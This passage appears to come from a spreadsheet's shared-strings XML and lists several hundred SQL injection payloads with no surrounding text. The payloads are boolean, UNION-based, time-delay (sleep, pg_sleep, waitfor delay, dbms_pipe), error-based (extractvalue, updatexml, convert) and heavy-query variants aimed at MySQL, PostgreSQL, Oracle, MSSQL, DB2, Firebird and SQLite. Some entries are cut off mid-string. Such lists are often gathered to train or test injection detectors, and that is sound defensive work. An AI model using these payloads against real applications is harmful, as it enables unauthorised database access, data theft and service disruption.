    <t>-6680' )  or 5483 = 3031 and  ( 'zxes' = 'zxes</t>
  </si>
  <si>
    <t>1'  )  )   and 4595 = 4595#</t>
  </si>
  <si>
    <t>1" where 4294 = 4294 and make_set ( 2543 = 7988,7988 ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( 'eocx' = 'eocx</t>
  </si>
  <si>
    <t>1 )  where 5418 = 5418 union all select null--</t>
  </si>
  <si>
    <t>1"  )  )   )  and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1 )  as qort where 1554 = 1554</t>
  </si>
  <si>
    <t>1 where 4331 = 4331 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-1644%' or make_set ( 9354 = 9354,7185 )  and '%' = '</t>
  </si>
  <si>
    <t>1 and 7533 = 7533-- spzi</t>
  </si>
  <si>
    <t>1"  )  )   )  and sleep ( 5 )  and   (  (   ( "bvgg" = "bvgg</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and 'fpaf' = 'fpaf</t>
  </si>
  <si>
    <t>-1287" )  as bbzg where 1475 = 1475 union all select 1475,1475,1475,1475,1475,1475,1475,1475,1475#</t>
  </si>
  <si>
    <t xml:space="preserve">-5207 )  where 6987 = 6987 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( </t>
  </si>
  <si>
    <t>1%"  )  )   and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1' or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and 'usnh' like 'usnh</t>
  </si>
  <si>
    <t>1  )  )   as mcyh where 1001 = 1001</t>
  </si>
  <si>
    <t>1  )  )   as kgit where 1919 = 1919 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1'  )  )   as oyad where 7161 = 7161 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>1" and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and "zwov" = "zwov</t>
  </si>
  <si>
    <t>-6453"  )  )   as hehs where 9363 = 9363 union all select 9363,9363,9363,9363,9363,9363,9363,9363,9363#</t>
  </si>
  <si>
    <t>-2820'  )  )   or 6679 = 8848--</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and "ilyw" like "ilyw</t>
  </si>
  <si>
    <t>1%" or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">-9721' or elt ( 9511 = 9238,9238 ) </t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) </t>
  </si>
  <si>
    <t>-6600' )  union all select 5566,5566#</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( 7711 = 7711</t>
  </si>
  <si>
    <t>1"  )  )   )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( "oyxk" = "oyxk</t>
  </si>
  <si>
    <t>1' and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and 'psdl' like 'psdl</t>
  </si>
  <si>
    <t>1"  )  )   or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  "lano" = "lano</t>
  </si>
  <si>
    <t>1'+ ( select 'jhce' where 1117 = 1117 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  )  +'</t>
  </si>
  <si>
    <t>-3161' )  or 8501 = 1796</t>
  </si>
  <si>
    <t>1" )  union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1 )  as nmlm where 9872 = 9872</t>
  </si>
  <si>
    <t>-8419 )  where 8692 = 8692 union all select 8692,8692,8692--</t>
  </si>
  <si>
    <t>1' in boolean mode )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) #</t>
  </si>
  <si>
    <t>-8166"  )  )   )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( "lcqb" = "lcqb</t>
  </si>
  <si>
    <t>1" )  as ckoi where 4674 = 4674 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-1628" union all select 9189,9189,9189,9189,9189,9189,9189,9189,9189--</t>
  </si>
  <si>
    <t xml:space="preserve">1" and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) </t>
  </si>
  <si>
    <t>1%' )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>1" )  where 5005 = 5005 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  </t>
  </si>
  <si>
    <t>1'+ ( select 'bsva' where 4378 = 4378 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  )  +'</t>
  </si>
  <si>
    <t>-9751"  )  )   )  or 5929 = 3884--</t>
  </si>
  <si>
    <t>1 )  as ewnv where 3393 = 3393 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1'  )  )   and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  'tqpj' = 'tqpj</t>
  </si>
  <si>
    <t>1'+ ( select jidy where 2989 = 2989 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>-4400 union all select 3983,3983,3983,3983,3983,3983,3983,3983,3983,3983--</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1' )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and  ( 'zaes' = 'zaes</t>
  </si>
  <si>
    <t>1" )  where 2837 = 2837 and  ( 3020 = 3020 ) *6703--</t>
  </si>
  <si>
    <t>1'|| ( select 'xasp' from dual where 4025 = 4025 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   ) ||'</t>
  </si>
  <si>
    <t>1'  )  )   )  and elt ( 2506 = 2383,2383 )  and   (  (   ( 'bjrj' = 'bjrj</t>
  </si>
  <si>
    <t>1"  )  )   and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (  "smnw" like "smnw</t>
  </si>
  <si>
    <t>1%' )  and 9198 = 9198--</t>
  </si>
  <si>
    <t>1'  )  )   )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( 'tzbp' = 'tzbp</t>
  </si>
  <si>
    <t>1%'  )  )   and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>-2704" )  union all select 1323,1323,1323,1323,1323,1323,1323,1323,1323--</t>
  </si>
  <si>
    <t>1%'  )  )   )  and  ( 9404 = 8390 ) *8390 and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1" where 3080 = 3080 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>1 where 1519 = 1519</t>
  </si>
  <si>
    <t>-1302"  )  )   as rshr where 2800 = 2800 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 1</t>
  </si>
  <si>
    <t>1" )  where 8657 = 8657</t>
  </si>
  <si>
    <t>1 )  where 9012 = 9012 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1' union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-5630" )  or 3038 = 3038</t>
  </si>
  <si>
    <t>1 )  where 8856 = 8856 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1'+ ( select 'midn' where 2819 = 2819 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  )  +'</t>
  </si>
  <si>
    <t>1%' and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and '%' = '</t>
  </si>
  <si>
    <t>-7737'|| ( select 'xalo' where 9219 = 9219 union all select 9219,9219,9219,9219#</t>
  </si>
  <si>
    <t>1" )  as xsgx where 5239 = 5239 union all select null,null--</t>
  </si>
  <si>
    <t>1' )  as xwlf where 9424 = 9424</t>
  </si>
  <si>
    <t>1%"  )  )   or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1' and 9198 = 9198--</t>
  </si>
  <si>
    <t>-6097%'  )  )   union all select 3990,3990,3990,3990,3990,3990--</t>
  </si>
  <si>
    <t>select  ( case when  ( 4415 = 2051 )  then 4415 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>-5800" )  or 6872 = 6872 and  ( "tcab" like "tcab</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and  ( '%' = '</t>
  </si>
  <si>
    <t>1"  )  )   and make_set ( 8403 = 8403,8899 )  and   (  (  "nsyl" = "nsyl</t>
  </si>
  <si>
    <t>-1908" )  where 6420 = 6420 union all select 6420,6420,6420,6420--</t>
  </si>
  <si>
    <t>1" where 1683 = 1683 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>1" )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and  ( "usht" like "usht</t>
  </si>
  <si>
    <t>-2054%"  )  )   )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +ch</t>
  </si>
  <si>
    <t>1 )  as zqxa where 5718 = 5718 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-1866'  )  )   as cwtv where 3295 = 3295 order by 1--</t>
  </si>
  <si>
    <t>1 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) -- mwsm</t>
  </si>
  <si>
    <t xml:space="preserve">1" and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) </t>
  </si>
  <si>
    <t>1 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>-7350'  )  )   )  union all select 9207,9207,9207,9207--</t>
  </si>
  <si>
    <t>-2384'|| ( select 'vhcp' from dual where 1266 = 1266 union all select 1266,1266,1266,1266--</t>
  </si>
  <si>
    <t>1' )  order by 1--</t>
  </si>
  <si>
    <t>-1485' )  or  ( 2056 = 4008 ) *4008 and  ( 'vphj' = 'vphj</t>
  </si>
  <si>
    <t>-4350"  )  )   as mmwq where 9801 = 9801 or  ( 8520 = 2834 ) *2834--</t>
  </si>
  <si>
    <t>-6580' )  union all select 9950,9950,9950,9950,9950,9950--</t>
  </si>
  <si>
    <t>-3541" or make_set ( 9354 = 9354,7185 )  and "fgxu" = "fgxu</t>
  </si>
  <si>
    <t>1"  )  )   )  and 5429 = 9596</t>
  </si>
  <si>
    <t>1" )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( "rzja" like "rzja</t>
  </si>
  <si>
    <t>1" )  as hhxx where 3372 = 3372 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%" or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and "%" = "</t>
  </si>
  <si>
    <t>1" )  where 4180 = 4180 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-5728 )  where 8663 = 8663 union all select 8663,8663,8663,8663,8663,8663,8663,8663,8663,8663#</t>
  </si>
  <si>
    <t>1%'  )  )   or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>-8292%' )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>1' procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and 'zlxw' = 'zlxw</t>
  </si>
  <si>
    <t>1' or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and 'qvyq' like 'qvyq</t>
  </si>
  <si>
    <t>1"  )  )   )  union all select null,null,null#</t>
  </si>
  <si>
    <t>select  ( case when  ( 4719 = 8852 )  then 1 else 4719* ( select 4719 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1 )  where 9821 = 9821 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>1" )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and  ( "gixv" = "gixv</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 1095 = 2853,1,1/0 ) </t>
  </si>
  <si>
    <t>1  )  )   as syot where 1199 = 1199</t>
  </si>
  <si>
    <t>1" and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and "vzud" like "vzud</t>
  </si>
  <si>
    <t xml:space="preserve">1' procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) </t>
  </si>
  <si>
    <t>1' rlike  ( select  ( case when  ( 6855 = 1056 )  then 1 else 0x28 end  )  )   and 'pmrz' like 'pmrz</t>
  </si>
  <si>
    <t>1' where 5819 = 5819 and  ( 1275 = 4759 ) *4759--</t>
  </si>
  <si>
    <t>1%' )  union all select null,null,null#</t>
  </si>
  <si>
    <t>-6254%'  )  )   )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1%'  )  )   or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1 )  where 9010 = 9010 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'ywjy' where 7579 = 7579</t>
  </si>
  <si>
    <t>-5317'  )  )   union all select 7673,7673,7673,7673,7673,7673#</t>
  </si>
  <si>
    <t>1" where 4652 = 4652 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1" where 7110 = 7110</t>
  </si>
  <si>
    <t>1" )  or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>1' )  and elt ( 7554 = 6257,6257 )  and  ( 'bpzm' = 'bpzm</t>
  </si>
  <si>
    <t>1'|| ( select 'ussi' where 8958 = 8958</t>
  </si>
  <si>
    <t xml:space="preserve">make_set ( 6174 = 9734,1 ) </t>
  </si>
  <si>
    <t>1' )  where 2330 = 2330 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) --</t>
  </si>
  <si>
    <t>1" where 2619 = 2619 and 2823 = 5100#</t>
  </si>
  <si>
    <t xml:space="preserve">1 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) </t>
  </si>
  <si>
    <t>-9227 )  where 6723 = 6723 union all select 6723,6723,6723,6723,6723,6723,6723,6723,6723,6723--</t>
  </si>
  <si>
    <t>1'+ ( select jley where 3581 = 3581 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>-8056  )  )   as botl where 9225 = 9225 or  ( 1182 = 7641 ) *7641--</t>
  </si>
  <si>
    <t>1" where 2512 = 2512 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-4572' )  union all select 3520--</t>
  </si>
  <si>
    <t>-1033 union all select 8731,8731,8731,8731,8731,8731--</t>
  </si>
  <si>
    <t>-1436' or 5699 = 5783--</t>
  </si>
  <si>
    <t>1%'  )  )   and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  'esal' = 'esal</t>
  </si>
  <si>
    <t xml:space="preserve">-5064 )  as mzxc where 1889 = 1889 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) </t>
  </si>
  <si>
    <t>1'+ ( select 'luhy' where 3112 = 3112 and  ( 3020 = 3020 ) *6703 ) +'</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (  'zlsq' = 'zlsq</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (   ( 'fuyl' = 'fuyl</t>
  </si>
  <si>
    <t>1' )  and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1' union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1" and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and "lgwe" like "lgwe</t>
  </si>
  <si>
    <t>1'+ ( select ggah where 3263 = 3263 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq'  )  )  +'</t>
  </si>
  <si>
    <t>-8034" )  where 1292 = 1292 union all select 1292,1292,1292,1292,1292#</t>
  </si>
  <si>
    <t>1%'  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>-7941%' )  union all select 6965,6965,6965,6965--</t>
  </si>
  <si>
    <t>1 where 4968 = 4968 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --</t>
  </si>
  <si>
    <t>-8325  )  )   as ajxq where 6630 = 6630 union all select 6630,6630,6630,6630,6630,6630--</t>
  </si>
  <si>
    <t>-6129 )  as vuze where 1565 = 1565 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t>1 )  where 1185 = 1185 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) # huhw</t>
  </si>
  <si>
    <t>1' where 1770 = 1770</t>
  </si>
  <si>
    <t>-5078 union all select 9708,9708--</t>
  </si>
  <si>
    <t>1' )  and elt ( 1210 = 1210,sleep ( 5  )  )   and  ( 'udvq' = 'udvq</t>
  </si>
  <si>
    <t>1  )  )   or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  9914 = 9914</t>
  </si>
  <si>
    <t>1 )  as wshv where 5684 = 5684</t>
  </si>
  <si>
    <t>1 )  as wokl where 1368 = 1368 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'+ ( select 'supo' where 8691 = 8691</t>
  </si>
  <si>
    <t>1"  )  )   as hfma where 2654 = 2654 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>1' )  where 3271 = 3271 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t xml:space="preserve">-5165'  )  )   or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char </t>
  </si>
  <si>
    <t>1' )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and  ( 'ifvz' like 'ifvz</t>
  </si>
  <si>
    <t>1  )  )   as jvvs where 9594 = 9594</t>
  </si>
  <si>
    <t>1'  )  )   and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  'ijyi' = 'ijyi</t>
  </si>
  <si>
    <t xml:space="preserve">1" and sleep ( 5 ) </t>
  </si>
  <si>
    <t>1' )  waitfor delay '0:0:5' and  ( 'fpnh' = 'fpnh</t>
  </si>
  <si>
    <t>1%'  )  )   or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>-8608" or 5460 = 4461--</t>
  </si>
  <si>
    <t>1%' and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1%' )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>-3283 )  where 1948 = 1948 union all select 1948,1948,1948#</t>
  </si>
  <si>
    <t>1 )  as cjmt where 4839 = 4839 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) --</t>
  </si>
  <si>
    <t>-1492 where 2788 = 2788 union all select 2788#</t>
  </si>
  <si>
    <t>1'|| ( select 'bzxa' where 6320 = 6320</t>
  </si>
  <si>
    <t>1' or sleep ( 5 )  and 'rpqn' like 'rpqn</t>
  </si>
  <si>
    <t>1" )  where 7471 = 7471 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  # mekk</t>
  </si>
  <si>
    <t>1'+ ( select xzvf where 9727 = 9727</t>
  </si>
  <si>
    <t>1' )  where 4683 = 4683 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  --</t>
  </si>
  <si>
    <t>1' where 8869 = 8869 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1"  )  )   as phis where 4420 = 4420 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  </t>
  </si>
  <si>
    <t>1 )  where 9160 = 9160</t>
  </si>
  <si>
    <t xml:space="preserve">1' and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) </t>
  </si>
  <si>
    <t>1%" order by 1#</t>
  </si>
  <si>
